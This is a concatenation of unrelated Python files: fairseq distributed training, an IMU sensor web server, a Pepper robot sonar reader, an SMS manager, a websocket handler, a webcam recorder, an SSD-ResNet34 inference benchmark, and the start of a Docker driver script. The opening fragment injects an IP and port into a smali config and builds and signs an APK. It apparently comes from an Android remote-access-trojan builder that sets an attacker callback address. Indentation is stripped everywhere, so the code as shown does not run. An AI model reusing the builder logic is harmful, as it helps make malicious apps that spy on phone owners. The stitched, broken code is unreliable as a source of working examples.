file = open(editor,"r").readlines()
file[16]=file[16][:21]+"\""+ip+"\""+"\n"
file[21]=file[21][:21]+"\""+port+"\""+"\n"
str_file="".join([str(elem) for elem in file])
# write the edited contents back to the file
open(editor,"w").write(str_file)
except Exception as e:
sys.exit("Failed to edit config.smali ({}): {}".format(editor, e))
# check that Java is installed
java_version = executeCMD("java -version")
if java_version.stderr == "":
print(Style.BRIGHT+Fore.RED+"\nJava Not Installed"+Fore.RESET)
else:
print(Style.BRIGHT+Fore.YELLOW+"\nGenerating apk file"+Fore.RESET)
# start building the apk
if args.output:
# take the output file name from the arguments
outFileName = args.output
else:
# otherwise use a default name
outFileName = "test.apk"
done=False
# Create a worker thread for the loading animation (currently disabled)
#t = threading.Thread(target=animate,args=("Building ",))
# Start the thread
#t.start()
# run the command that builds the apk
resOut = executeCMD("java -jar Jar_Files/apktool.jar b Compiled_apk_files -o "+outFileName)
done = True
#t.join()
if not resOut.returncode:
print(Style.BRIGHT+Fore.GREEN+"\rSuccessfully apk built "+getpwd(outFileName)+"\n"+Fore.RESET,end="")
print(Style.BRIGHT+Fore.YELLOW+"\nSigning the apk"+Fore.RESET)
done=False
# show a loading animation while the signing thread runs (currently disabled)
#t = threading.Thread(target=animate,args=("Signing ",))
#t.start()
# run the command that signs the apk built above
resOut = executeCMD("java -jar Jar_Files/sign.jar "+outFileName+" --override")
done = True
#t.join()
# check the result of the signing command
if not resOut.returncode:
print(Fore.GREEN+"\rSuccessfully signed the apk "+outFileName+Fore.RESET,end="")
print(" ")
else:
print("\r"+resOut.stderr)
print(Fore.RED+"Signing Failed"+Fore.RESET)
else:
print("\r"+resOut.stderr)
print(Fore.RED+"Building Failed"+Fore.RESET)
|
multiprocessing_train.py
|
#!/usr/bin/env python3 -u
import os
import random
import signal
import torch
from fairseq import distributed_utils, options
from train import main as single_process_main
def main(args):
# Set distributed training parameters for a single node.
if not args.distributed_world_size:
args.distributed_world_size = torch.cuda.device_count()
port = random.randint(10000, 20000)
args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)
args.distributed_init_host = 'localhost'
args.distributed_port = port + 1
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(args.distributed_world_size):
args.distributed_rank = i
args.device_id = i
procs.append(mp.Process(target=run, args=(args, error_queue), daemon=True))
procs[i].start()
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, error_queue):
try:
args.distributed_rank = distributed_utils.distributed_init(args)
single_process_main(args)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.distributed_rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
self.children_pids.append(pid)
def error_listener(self):
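# Re-queue the first error so signal_handler() can read it from the main thread,
# then raise SIGUSR1 in our own process to interrupt the main thread.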
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = "\n\n-- Tracebacks above this line can probably be ignored --\n\n"
msg += original_trace
raise Exception(msg)
if __name__ == '__main__':
parser = options.get_training_parser()
args = options.parse_args_and_arch(parser)
main(args)
|
server.py
|
import asyncio
import json
import re
from itertools import cycle
from threading import Thread
from time import sleep
import serial
from aiohttp import web
from scipy import signal
class Sensor:
# Serial message patterns.
re_patterns = [
r'(RPY) - Roll: (-?\d+) \| Pitch: (-?\d+) \| Yaw: (-?\d+)',
r'(ACC) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
r'(GYR) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
r'(MAG) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
]
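# Example serial lines matched by the patterns above (values are illustrative):
#   RPY - Roll: 123 | Pitch: -45 | Yaw: 6789
#   ACC - x: 1024 | y: -2048 | z: 16384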
def __init__(self, port='COM4', history=None):
self._port = port
self._close = False
self._indexes = {
'RPY': 0,
'ACC': 0,
'GYR': 0,
'MAG': 0,
}
if history is not None:
self._history = history
self._thread = None
else:
self._history = {
'RPY': [],
'ACC': [],
'GYR': [],
'MAG': [],
}
self._thread = Thread(target=self._update)
self._thread.start()
def _update(self):
self._ser = serial.Serial(self._port, 115200, timeout=0.1)
self._ser.readline()  # discard the first two readings to prime the stream
self._ser.readline()
temp = {}
while not self._close:
while True:
try:
line = self._ser.readline().decode()
except UnicodeDecodeError:
# Truncated unicode may appear when the program just starts.
continue
else:
break
if line.startswith('END') and len(temp) == 4:
for k, v in temp.items():
self._history[k].append(v)
temp = {}
else:
for pattern in self.re_patterns:
match = re.search(pattern, line)
t = []
if match:
if match.group(1) == 'RPY':
for i in range(2, 5):
v = float(match.group(i)) / 100
t.append(v)
t[1] = -t[1] # pitch is reversed.
elif match.group(1) == 'ACC':
for i in range(2, 5):
v = -float(match.group(i)) / (65536 / 2) * 2  # ACC is sign-reversed as well
t.append(v)
elif match.group(1) == 'GYR':
for i in range(2, 5):
v = float(match.group(i)) / (65536 / 2) * 2000
t.append(v)
elif match.group(1) == 'MAG':
for i in range(2, 5):
v = float(match.group(i)) * 0.15
t.append(v)
temp[match.group(1)] = t
break
def next(self, key):
'''Get the next data point, and block until data are ready.'''
key = key.upper()
index = self._indexes[key]
seq = self._history[key]
while index >= len(seq):
sleep(0.05)
self._indexes[key] = index + 1
return seq[index]
def save(self, path):
with open(path, encoding='utf-8', mode='w') as file:
json.dump(self._history, file)
def close(self):
self._close = True
while self._thread and self._thread.is_alive():
sleep(0.1)
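# Typical offline workflow (a sketch; 'capture.json' is an assumed file name):
#   sensor = Sensor(port='COM4')
#   ... read sensor.next('RPY') while recording ...
#   sensor.save('capture.json'); sensor.close()
# The saved JSON can later be analysed by POSTing {"analyse": "capture.json"} to /path,
# then querying /analyse.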
async def mock_display_handler(request):
'''For testing when the board is not connected.'''
roll = cycle(range(10, 100, 10))
pitch = cycle(range(10, 100, 10))
yaw = cycle(range(10, 100, 10))
ws = web.WebSocketResponse()
await ws.prepare(request)
while True:
try:
await ws.receive(timeout=0.01)
except asyncio.TimeoutError:
sleep(0.5)
# await ws.send_json([next(roll), next(pitch), next(yaw)])
await ws.send_json([29.89, 55.37, 10.97])
else:
break
return ws
async def display_handler(request):
'''Handler for AH'''
ws = web.WebSocketResponse()
await ws.prepare(request)
sensor = Sensor()
while True:
try:
await ws.receive(timeout=0.01)
except asyncio.TimeoutError:
await ws.send_json(sensor.next('RPY'))
else:
break
if request.app['files']['save_file'] != 'None':
sensor.save(request.app['files']['save_file'])
sensor.close()
return ws
async def analyse_handler(request):
'''Handler for charts'''
param = await request.json()
name = param['name']
order = param['order']
freq = param['freq']
with open(request.app['files']['history_file'], encoding='utf-8') as file:
history = json.load(file)
data = history[name]
# Optional zero-phase low-pass filtering: design an order-N Butterworth filter and
# apply it forward and backward with filtfilt so no phase shift is introduced.
if order != 'None':
b, a = signal.butter(int(order), freq, 'lowpass')
data_x = [v[0] for v in data]
data_y = [v[1] for v in data]
data_z = [v[2] for v in data]
data_x = signal.filtfilt(b, a, data_x)
data_y = signal.filtfilt(b, a, data_y)
data_z = signal.filtfilt(b, a, data_z)
data = [[v_x, v_y, v_z] for v_x, v_y, v_z in zip(data_x, data_y, data_z)]
return web.json_response(data)
async def path_handler(request):
'''Receive paths to history json.'''
path_obj = await request.json()
if 'display' in path_obj:
if path_obj['display'] == 'None':
app['files']['save_file'] = path_obj['display']
text = 'ACK'
else:
try:
with open(path_obj['display'], encoding='utf-8', mode='w') as _:
app['files']['save_file'] = path_obj['display']
except Exception as exc:
text = repr(exc)
else:
text = 'ACK'
elif 'analyse' in path_obj:
try:
with open(path_obj['analyse'], encoding='utf-8') as _:
app['files']['history_file'] = path_obj['analyse']
except Exception as exc:
text = repr(exc)
else:
text = 'ACK'
else:
text = 'Invalid path type!'
return web.Response(text=text)
app = web.Application()
app['files'] = {
'save_file': None,
'history_file': None,
}
app.add_routes([
web.get('/display', mock_display_handler),
# web.get('/display', display_handler),
web.post('/analyse', analyse_handler),
web.post('/path', path_handler),
web.static('/', './static'),
])
web.run_app(app)
|
getsonar.py
|
#http://doc.aldebaran.com/2-5/naoqi/core/almemory-api.html
#http://doc.aldebaran.com/2-5/family/pepper_technical/pepper_dcm/actuator_sensor_names.html#ju-sonars
from __future__ import print_function
import qi
import argparse
import sys
import time
import threading
sonarValueList = ["Device/SubDeviceList/Platform/Front/Sonar/Sensor/Value",
"Device/SubDeviceList/Platform/Back/Sonar/Sensor/Value"]
import os
def rhMonitorThread (memory_service):
t = threading.currentThread()
while getattr(t, "do_run", True):
sonarValues = memory_service.getListData(sonarValueList)
print "[Front, Back]", sonarValues
time.sleep(1)
print "Exiting Thread"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
app = qi.Application(["SonarReader", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
#Starting services
memory_service = session.service("ALMemory")
# create a thread that directly monitors the sonar values in ALMemory
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
#Program stays at this point until we stop it
app.run()
monitorThread.do_run = False
print "Finished"
if __name__ == "__main__":
main()
|
pysms.py
|
from threading import Thread
from multiprocessing import Pool
from datetime import datetime
def join_threads(threads):
for t in threads:
t.join()
class ApiRequestError(Exception):
def __init__(self, message):
super().__init__(message)
class DeviceManager():
def __init__(self, identifier):
self.current = None
self.identifier = identifier
self.devices = {}
def add_device(self, **kwargs):
self.devices[kwargs[self.identifier]] = kwargs
self.current = kwargs[self.identifier]
def switch_device(self, id):
try:
self.current = self.devices[id]
except KeyError:
raise KeyError('Device {} not in added devices'.format(id))
def send_all(self, message):
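# self.service and self.send_sms are assumed to be provided by a carrier-specific
# subclass; they are not defined in this base class.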
if self.service == 'verizon':
self.send_sms(message, [i[self.identifier] for i in self.devices])
return
_threads = []
for device in self.devices:
t = Thread(target=self.send_sms, args=(message, device))
_threads.append(t)
t.start()
t = Thread(target=join_threads, args=(_threads, ))
t.start()
def read_all(self, time=None):
# default to today's date at call time (a default argument would be evaluated only once, at definition time)
if time is None:
time = datetime.now().date()
_times = [time] * len(self.devices)
# get_sms_history is expected to be provided by a service-specific subclass
with Pool() as pool:
_history = pool.starmap(self.get_sms_history, zip(self.devices, _times))
sms_history = {}
for dev, msg in zip(self.devices, _history):
sms_history[dev] = msg
return sms_history
|
socket_handler.py
|
import threading
import websocket
import json
import logging
logging.basicConfig()
class SocketHandler(threading.Thread):
def __init__(self, host, send_q, recv_q, debug=False, sentinel=None):
super(SocketHandler, self).__init__()
self.debug = debug
self.send_q = send_q
self.recv_q = recv_q
self._sentinel = sentinel
self.ready = False
def on_message(ws, message):
self.recv_q.put(json.loads(message))
logging.debug(message)
def on_error(ws, error):
logging.error(error)
ws.close()
def on_close(ws, close_status_code, close_msg):
# TODO: implement reconnection strategy
pass
def on_open(ws):
self.ready = True
self.ws = websocket.WebSocketApp('ws://%s:8899/websocket' % host,
on_message = on_message,
on_error = on_error,
on_close = on_close,
on_open = on_open)
# Run the WebSocket handler in its own thread
def run_ws():
self.ws.run_forever()
threading.Thread(target=run_ws).start()
if self.debug:
print('opened socket to %s:%d' % (host, 8899))
def run(self):
while True:
# Pull new messages to send off the queue
if self.send_q.qsize() > 0 and self.ready:
msg = self.send_q.get()
# Check if we're being told to shut down
if msg is self._sentinel:
self.ws.close()
break
if self.debug: print("Tx: " + json.dumps(msg))
msg_to_send = json.dumps(msg) + "\r\n"
# Send the message
self.ws.send(msg_to_send)
self.send_q.task_done()
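# Minimal usage sketch (host and message contents are assumed for illustration):
#   from queue import Queue
#   send_q, recv_q = Queue(), Queue()
#   handler = SocketHandler('192.168.1.10', send_q, recv_q, debug=True)
#   handler.start()
#   send_q.put({'cmd': 'status'})  # queued messages are JSON-encoded and sent
#   send_q.put(None)               # the default sentinel (None) closes the socket and stops the thread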
|
__main__.py
|
"""
A security camera on computer using webcam.
"""
from datetime import datetime
from multiprocessing import Process, cpu_count
import os
import security_webcam as sw
def main():
""" Main Loop """
args = sw.parse_inputs()
print(f"Settings >>> top fps: {args.fps}, recording length: {args.max_len} minutes")
sw.utils.log_event('start')
sw.utils.create_vid_dir(args.output)
cc = sw.CameraControl(fps=args.fps, temp_buffer_len=args.temp_buffer_len,
vid_buffer_len=args.vid_buffer_len, max_len=args.max_len,
show_cam=args.show, show_time=args.time)
cc.start_cam()
input(">>> Press Enter to start recording...")
while True:
if args.verbose: print("Recording...")
sw.utils.log_event('recording')
bufs, frame_size, real_fps = cc.start_recording(verbose=args.verbose)
if args.verbose: print("Saving footage...")
sw.utils.log_event('save')
filename = os.path.join(args.output, str(datetime.today()) + '.mov')
p = Process(target=sw.utils.output_vid, args=(filename, bufs, real_fps, frame_size))
p.start()
sw.utils.log_event('exit')
cc.close_cam()
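# NOTE: the recording loop above never breaks, so log_event('exit') and close_cam()
# are not reached in the current flow; recording stops when the process is interrupted.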
if __name__ == "__main__":
main()
|
infer_tb.py
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
### This file is originally from: [mlcommons repo](https://github.com/mlcommons/inference/tree/r0.5/others/cloud/single_stage_detector/pytorch/infer.py)
import os
from argparse import ArgumentParser
from utils import DefaultBoxes, Encoder, COCODetection
from base_model import Loss
from utils import SSDTransformer
from ssd_r34 import SSD_R34
import torch
from torch.autograd import Variable
from torch.utils.data import DataLoader
import time
import numpy as np
import torch.nn as nn
from torch.utils import ThroughputBenchmark
import threading
import torch.fx.experimental.optimization as optimization
use_ipex = False
if os.environ.get('USE_IPEX') == "1":
import intel_extension_for_pytorch as ipex
use_ipex = True
def parse_args():
parser = ArgumentParser(description="Train Single Shot MultiBox Detector"
" on COCO")
parser.add_argument('--data', '-d', type=str, default='../coco',
help='path to test and training data files')
parser.add_argument('--no-cuda', action='store_true',
help='do not use available GPUs')
parser.add_argument('--seed', '-s', type=int,
help='manually set random seed for torch')
parser.add_argument('--device', '-did', type=int,
help='device id')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--batch-size', '-b', type=int, default=32,
help='set batch size for evaluation, default is 32')
parser.add_argument('--iteration', '-iter', type=int, default=None,
help='set the iteration of inference, default is None')
parser.add_argument('-p', '--print-freq', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--threshold', '-t', type=float, default=0.20,
help='stop training early at threshold')
parser.add_argument('--checkpoint', type=str, default='',
help='path to model checkpoint file, default is None')
parser.add_argument('--image-size', default=[1200,1200], type=int, nargs='+',
help='input image sizes (e.g. 1400 1400, 1200 1200)')
parser.add_argument('--strides', default=[3,3,2,2,2,2], type=int, nargs='+',
help='strides for the ssd model; must include 6 numbers')
parser.add_argument('--use-fp16', action='store_true')
parser.add_argument('--ipex', action='store_true', default=False,
help='use intel pytorch extension')
parser.add_argument('--int8', action='store_true', default=False,
help='enable ipex int8 path')
parser.add_argument('--jit', action='store_true', default=False,
help='enable ipex jit path')
parser.add_argument('--calibration', action='store_true', default=False,
help='doing int8 calibration step')
parser.add_argument('--configure', default='configure.json', type=str, metavar='PATH',
help='path to int8 configures, default file name is configure.json')
parser.add_argument("--dummy", action='store_true',
help="using dummu data to test the performance of inference")
parser.add_argument('-w', '--warmup-iterations', default=0, type=int, metavar='N',
help='number of warmup iterations to run')
parser.add_argument('--autocast', action='store_true', default=False,
help='enable autocast')
parser.add_argument('--profile', action='store_true', default=False,
help='enable profile')
parser.add_argument('--number-instance', default=7, type=int,
help='the instance number for throughput benchmark')
parser.add_argument('--use-throughput-benchmark', action='store_true', default=False,
help='use throughput benchmark')
return parser.parse_args()
def show_memusage(device=0):
import gpustat
gpu_stats = gpustat.GPUStatCollection.new_query()
item = gpu_stats.jsonify()["gpus"][device]
print("{}/{}".format(item["memory.used"], item["memory.total"]))
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
class SSD_R34_NMS(nn.Module):
def __init__(self, model = None, encoder = None):
super(SSD_R34_NMS, self).__init__()
assert model is not None
assert encoder is not None
self.model = model
self.encoder = encoder
def forward(self, img):
ploc, plabel = self.model(img)
results = self.encoder.decode_batch(ploc, plabel, 0.5, 200, 0)
return results
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
def dboxes_R34_coco(figsize,strides):
ssd_r34=SSD_R34(81,strides=strides)
synt_img=torch.rand([1,3]+figsize)
_,_,feat_size =ssd_r34(synt_img, extract_shapes = True)
steps=[(int(figsize[0]/fs[0]),int(figsize[1]/fs[1])) for fs in feat_size]
# use the scales here: https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py
scales = [(int(s*figsize[0]/300),int(s*figsize[1]/300)) for s in [21, 45, 99, 153, 207, 261, 315]]
aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
dboxes = DefaultBoxes(figsize, feat_size, steps, scales, aspect_ratios)
return dboxes
def coco_eval(model, val_dataloader, cocoGt, encoder, inv_map, args):
from pycocotools.cocoeval import COCOeval
device = args.device
threshold = args.threshold
use_cuda = not args.no_cuda and torch.cuda.is_available()
model.eval()
ret = []
inference_time = AverageMeter('InferenceTime', ':6.3f')
decoding_time = AverageMeter('DecodingTime', ':6.3f')
progress = ProgressMeter(
args.iteration if args.dummy else len(val_dataloader),
[inference_time, decoding_time],
prefix='Test: ')
Profilling_iterator = 99
start = time.time()
if args.int8:
model = model.eval()
model_decode = SSD_R34_NMS(model, encoder)
print('int8 conv_bn_fusion enabled')
with torch.no_grad():
model_decode.model.model = optimization.fuse(model_decode.model.model, inplace=False)
if args.calibration:
print("runing int8 LLGA calibration step not support in throughput benchmark")
else:
print("INT8 LLGA start trace")
# insert quant/dequant based on configure.json
conf = ipex.quantization.QuantConf(configure_file=args.configure)
model_decode.eval()
model_decode = ipex.quantization.convert(model_decode, conf, torch.randn(args.batch_size, 3, 1200, 1200))
print("done ipex default recipe.......................")
# freeze the module
# model = torch.jit._recursive.wrap_cpp_module(torch._C._freeze_module(model._c, preserveParameters=True))
# model_decode = torch.jit._recursive.wrap_cpp_module(torch._C._freeze_module(model_decode._c, preserveParameters=True))
# After freezing, run 1 time to warm up the profiling graph executor to insert prim::profile
# At the 2nd run, the llga pass will be triggered and the model is turned into an int8 model: prim::profile will be removed and will have LlgaFusionGroup in the graph
with torch.no_grad():
for i in range(2):
# _ = model_decode(torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last))
_ = model_decode(torch.randn(args.batch_size, 3, 1200, 1200))
if args.use_throughput_benchmark:
print('running int8 real-input inference, use_throughput_benchmark path')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
#bench.add_input(img.to(memory_format=torch.channels_last))
bench.add_input(img)
if nbatch == args.iteration:
break
if args.profile:
print("Profilling")
with torch.profiler.profile(on_trace_ready=torch.profiler.tensorboard_trace_handler("./int8_log")) as prof:
# ploc, plabel = model(img)
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
# print(prof.key_averages().table(sort_by="self_cpu_time_total"))
else:
# ploc, plabel = model(img)
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('running int8 real-input inference, pthread weight-sharing path')
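# Each thread below shares the same model object (model_decode), so the weights are
# shared in memory; every thread runs the full validation loop and reports its own throughput.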
def run_model(m, tid):
time_consume = 0
with torch.no_grad():
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
#m(img.to(memory_format=torch.channels_last))
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
if args.dummy:
print('dummy inputs inference path is not supported')
else:
print('running real inputs path')
model_decode = SSD_R34_NMS(model, encoder)
if args.autocast:
print('bf16 autocast enabled')
print('enable nhwc')
# model = model.to(memory_format=torch.channels_last)
model_decode.model = model_decode.model.to(memory_format=torch.channels_last)
if use_ipex:
print('bf16 block format weights cache enabled')
# model.model = ipex.optimize(model.model, dtype=torch.bfloat16, level='O0')
model_decode.model.model = ipex.optimize(model_decode.model.model, dtype=torch.bfloat16, inplace=False)
if args.jit:
print('enable jit')
with torch.cpu.amp.autocast(), torch.no_grad():
# model = torch.jit.trace(model, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
model_decode = torch.jit.trace(model_decode, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
# model = torch.jit.freeze(model)
model_decode = torch.jit.freeze(model_decode)
if args.use_throughput_benchmark:
print('bf16 throughput benchmark')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
bench.add_input(img.to(memory_format=torch.channels_last))
if nbatch == args.iteration:
break
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('bf16 pthread weight sharing path')
def run_model(m, tid):
time_consume = 0
with torch.no_grad():
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
img = img.to(memory_format=torch.channels_last)
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
if use_ipex:
print('IPEX autocast imperative path is not supported in throughput benchmark')
else:
print("OOB Autocast imperative path in throughput benchmark not support")
exit(-1)
else:
print('autocast disabled, fp32 is used')
print('enable nhwc')
model_decode.model = model_decode.model.to(memory_format=torch.channels_last)
if use_ipex:
print('fp32 block format weights cache enabled')
model_decode.model.model = ipex.optimize(model_decode.model.model, dtype=torch.float32, inplace=False)
if args.jit:
print("enable jit")
with torch.no_grad():
model_decode = torch.jit.trace(model_decode, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
model_decode = torch.jit.freeze(model_decode)
if args.use_throughput_benchmark:
print('fp32 throughput benchmark')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
bench.add_input(img.to(memory_format=torch.channels_last))
if nbatch == args.iteration:
break
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('fp32 pthread weight sharing path')
def run_model(m, tid):
time_consume = 0
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
img = img.to(memory_format=torch.channels_last)
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
print("FP32 Imperative path with weight sharing is not enabled")
exit(-1)
if args.use_throughput_benchmark:
print("Predicting Ended, total time: {:.2f} s".format(time.time()-start))
batch_size = args.batch_size
latency = stats.latency_avg_ms
perf = stats.iters_per_second * batch_size
print('inference latency %.2f ms'%latency)
print('inference performance %.2f fps'%perf)
if not args.dummy:
print("Throughput: {:.3f} fps".format(perf))
else:
total_time_avg = inference_time.avg
throughput = batch_size / total_time_avg
print("Throughput: {:.3f} fps".format(throughput))
return False
def eval_ssd_r34_mlperf_coco(args):
from coco import COCO
# Check that GPUs are actually available
use_cuda = not args.no_cuda and torch.cuda.is_available()
dboxes = dboxes_R34_coco(args.image_size, args.strides)
encoder = Encoder(dboxes)
val_trans = SSDTransformer(dboxes, (args.image_size[0], args.image_size[1]), val=True)
if not args.dummy:
val_annotate = os.path.join(args.data, "annotations/instances_val2017.json")
val_coco_root = os.path.join(args.data, "val2017")
cocoGt = COCO(annotation_file=val_annotate)
val_coco = COCODetection(val_coco_root, val_annotate, val_trans)
inv_map = {v:k for k,v in val_coco.label_map.items()}
val_dataloader = DataLoader(val_coco,
batch_size=args.batch_size,
shuffle=False,
sampler=None,
num_workers=args.workers)
labelnum = val_coco.labelnum
else:
cocoGt = None
encoder = None
inv_map = None
val_dataloader = None
labelnum = 81
ssd_r34 = SSD_R34(labelnum, strides=args.strides)
if args.checkpoint:
print("loading model checkpoint", args.checkpoint)
od = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)
ssd_r34.load_state_dict(od["model"])
if use_cuda:
ssd_r34.cuda(args.device)
elif args.ipex:
ssd_r34 = ssd_r34.to(ipex.DEVICE)
coco_eval(ssd_r34, val_dataloader, cocoGt, encoder, inv_map, args)
def main():
args = parse_args()
print(args)
if not os.path.isdir('./models'):
os.mkdir('./models')
if args.seed is not None:
print("Using seed = {}".format(args.seed))
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if not args.no_cuda:
torch.cuda.set_device(args.device)
torch.backends.cudnn.benchmark = True
eval_ssd_r34_mlperf_coco(args)
if __name__ == "__main__":
main()
|
cca.py
|
#!/usr/bin/env python3
'''
A driver script for CCA container image
Copyright 2021 Codinuum Software Lab <https://codinuum.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
import time
import shutil
from datetime import datetime, timedelta
from subprocess import Popen, run
from threading import Thread
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
IMAGE_NAME = 'codecontinuum/ddj'
#IMAGE_NAME = 'ddjx'
#
CCA_HOME = '/opt/cca'
CCA_VAR = '/var/lib/cca'
CCA_LOG_DIR = '/var/log/cca'
CCA_SOURCE_DIR = CCA_VAR+'/source'
CCA_CACHE_DIR = CCA_VAR+'/cache'
CCA_WORK_DIR_NAME = '__CCA__'
CONTAINER_CMD = 'docker'
DEPENDENCIES_INSTALLER = 'install_dependencies.sh'
TIMEOUT = 5
BUFSIZE = 0 # unbuffered
STAT_NAME = 'status'
DEFAULT_CACHE_DIR = os.path.join(os.environ['HOME'], '.cca', 'cache')
#WIN_HOST_FLAG = sys.platform.startswith('win')
### timezone
